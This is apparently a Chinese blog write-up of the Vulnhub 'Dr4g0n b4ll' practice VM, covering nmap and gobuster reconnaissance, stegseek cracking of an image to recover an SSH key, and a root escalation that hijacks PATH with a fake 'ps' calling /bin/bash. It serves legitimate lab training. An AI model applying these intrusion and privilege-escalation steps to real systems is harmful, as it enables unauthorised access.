【Vulnhub系列】Vulnhub_Dr4g0n_b4ll 靶场渗透(原创)

最新推荐文章于 2024-08-22 19:51:07 发布
最新推荐文章于 2024-08-22 19:51:07 发布
阅读量459 收藏 6
点赞数 10
分类专栏: Vulnhub系列 文章标签: 网络安全 安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70142722/article/details/140819775
版权

【Vulnhub系列靶场】Vulnhub_Dr4g0n_b4ll靶场渗透

原文转载已经过授权
原文链接:Lusen的小窝 - 学无止尽,不进则退 (lusensec.github.io)

一、环境搭建

选择打开.ovf 文件

image-20240224152423286

配置名称和路径

image-20240224152402352

打开后调整网络连接模式为【NAT】即可

二、信息收集

1、主机发现

nmap.exe -sn 192.168.31.*

image-20240224135014762

2、端口扫描

1、快速粗略的端口扫描

nmap.exe -F 192.168.31.65
image-20240224135148134

2、详细端口扫描

nmap.exe -sT --min-rate 10000 -p- 192.168.31.65
nmap.exe -sU --min-rate 10000 -p- 192.168.31.65

image-20240224135658689

3、详细扫描和漏洞探测

nmap.exe -sV -A -p22,80 192.168.31.65

image-20240224135440463

nmap.exe --script=vuln -p22,80 192.168.31.65

image-20240224135500772

只发现了一个robots.txt 的文件

3、web 目录探测

gobuster.exe dir -u http://192.168.31.65 -w d:\theperson\dirs\dicc.txt -b 404,403 --no-error

image-20240224140201673

4、web 框架探测

whatweb http://192.168.31.65

image-20240224140522211

三、获取shell立足点

1、查看敏感信息

1、主页

image-20240224140723028

2、robots.txt 文件

image-20240224140817155

进行base64解码:

image-20240224140957715

3、源代码

image-20240224141117019

image-20240224141448789

2、DRAGON BALL目录信息

image-20240224142227549

1、secret.txt 文件

image-20240224142428287

保存下来做目录爆破

image-20240224143723348

并无收获

2、Vulnhub 目录

image-20240224143748924

3、Vulnhub/login.html:是一个虚假的登录页面

image-20240224143820482

4、aj.jpg:一张黑客的图片

image-20240224144139876

3、图片信息提取

提取图片隐写信息

stegseek aj.jpg /usr/share/wordlists/rockyou.txt
image-20240224150532499

image-20240224150607293

4、获取shell 立足点

此时拿到一个ssh密钥,欠缺用户名,此处的xmen 是用户名

image-20240224150858190

我们直接用密钥进行登录

ssh xmen@192.168.31.65 -i id_rsa

image-20240224150946067

成功拿到shell

四、提权至root

1、查看敏感文件

image-20240224151439588

shell 是一个suid权限,发现可以执行环境变量中的ps 命令,那么可以尝试用环境变量劫持来提权

2、提权至root

cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
cd ~/script
./script

image-20240224151818159

原文转载已经过授权
更多文章请访问原文链接:Lusen的小窝 - 学无止尽,不进则退 (lusensec.github.io)

京落尘
关注
  • 10
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web安全Dr4g0n-b4ll 靶场笔记
weixin_46301214的博客
03-28 513
看了一下这两个源代码和运行结果,应该要联想到是有关系的,毕竟是ctf,是简单一点的。接下来先在我当前家目录下创建一个文件,用来运行提权的,最好在临时文件夹搞。先不要扫描,直接访问:192.168.111.133,打开是普通的网页。直接变成root权限,虽然不清楚为什么是root权限,但是知道。打开源码,发现密文,base64解码多次,得到没啥用的东西。最后,root提权,先来寻找一下有root权限的文件有哪些。因为是首页的提示,但要你输入密码,不一定是有隐写存在。
红队打靶:DR4G0N B4LL打靶思路详解(vulnhub
Bossfrank的博客
02-28 1364
本文是vulnhub靶机DR4G0N B4LL:1的详细思路与打靶过程。涉及到的知识点有:常规Web渗透思路、使用脚本进行字符串处理、curl批量访问、stegseek图片隐写破解、变量劫持提权等。
vuln靶场--Dr4g0n-b4ll
bobo_milk的博客
05-13 591
目录 一、信息收集 二、漏洞发现 三、权限提升 总结 一、信息收集 常规的主机发现以及端口扫描,扫描自己所在的网段。 nmap 192.168.216.0/24 ​​​​ nmap -A -v -T4 -p 1-65535 192.168.216.146 可以看到服务器开启了80端口和22ssh的端口以及一些服务器的信息,网站搭建的中间件以及版本等等信息。 二、漏洞发现 访问服务器的80端口 一个...
vulnhub靶机Dr4g0n b4ll :1渗透笔记
m0_64122957的博客
05-17 976
https://note.youdao.com/s/aFd9cC57https://note.youdao.com/s/aFd9cC57
Dr4g0n b4ll--龙珠靶机
懂系长
06-09 201
Dr4g0n b4ll---龙珠靶机
渗透学习第一天:DR4G0N B4LL靶场复现
黑战士的博客
04-10 581
这次靶场复现学习到了很多思路,作为一个菜鸡,还有很多要学的。
全网最详细vluhubdr4g0n
weixin_68119378的博客
03-26 242
全网最详细靶机实战教程
VulnHub】【2023年07月18日】最新全部靶场详情(下)
热门推荐
惟忆
07-18 1万+
VulnHub】【2023年07月18日】最新全部靶场详情(下)
VulnHub】【2023年07月18日】最新全部靶场详情(中)
惟忆
07-18 9507
VulnHub】【2023年07月18日】最新全部靶场详情(中)
dr4g0n-开源
07-16
Linux 机器上的其他渗透测试工具
DR.zip_DR_DR matlab_smallerkpg_读取数据
07-14
matlab编程,将文本文件中的数值数据作为列矢量导入。
DR.rar_DR_PDOP_gps dr kalman matlab_kalman 导航_navigation
09-19
标题中的"DR.rar_DR_PDOP_gps dr kalman matlab_kalman 导航_navigation"涉及到的是一个与动态定位(DR, Dead Reckoning)技术相关的项目,该技术是基于已知的运动模型和初始位置,通过连续积累传感器数据来估算目标...
sipart_dr21
03-16
SIPART DR21是西门子公司生产的一款紧凑型控制器,用于实现精确的运动控制。该控制器具备灵活的组态能力和丰富的监控功能,适用于各类自动化和控制领域。用户手册提供了关于该设备的操作说明和组态信息,其中包括...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8407
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
数采网关面临的安全挑战
编程之道在明明德在亲民在止于至善
08-22 225
数采网关面临的安全挑战
第134天:内网安全-横向移动&NTLM-Relay重放&Responder中继攻击&Ldap&Ews
weixin_71529930的博客
08-22 414
本节案例适用于不能获得域控密码和hash的情况。
92.WEB渗透测试-信息收集-Google语法(6)
最新发布
计算机王的博客
08-22 134
web渗透测试
SPI_DR_HIGH和SPI_DR_LOW有什么区别
07-18
SPI_DR_HIGH 和 SPI_DR_LOW 是串行外设接口(Serial Peripheral Interface,简称SPI)通信中两个重要的信号线,它们通常用于控制数据接收(Data Receive)操作。SPI是一种全双工模式,数据既可以从主设备发送到从设备,也可以从从设备接收回主设备。 SPI_DR_HIGH 表示数据接收线上方电平较高,一般表示从设备正在向主设备发送数据(Master在接收)。此时主控会读取这个信号线上的数据,并将其存储到相应的寄存器或数据缓冲区。 SPI_DR_LOW 则表示数据接收线上方电平较低,意味着主设备接收到从设备的数据传输完毕,或者是从设备空闲状态,没有新的数据可以接收。这时候主控可以继续处理已接收到的数据,或者等待下一轮数据传输。 简单来说,SPI_DR_HIGH 是数据传输活动的标记,而 SPI_DR_LOW 表示数据传输结束或暂停。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值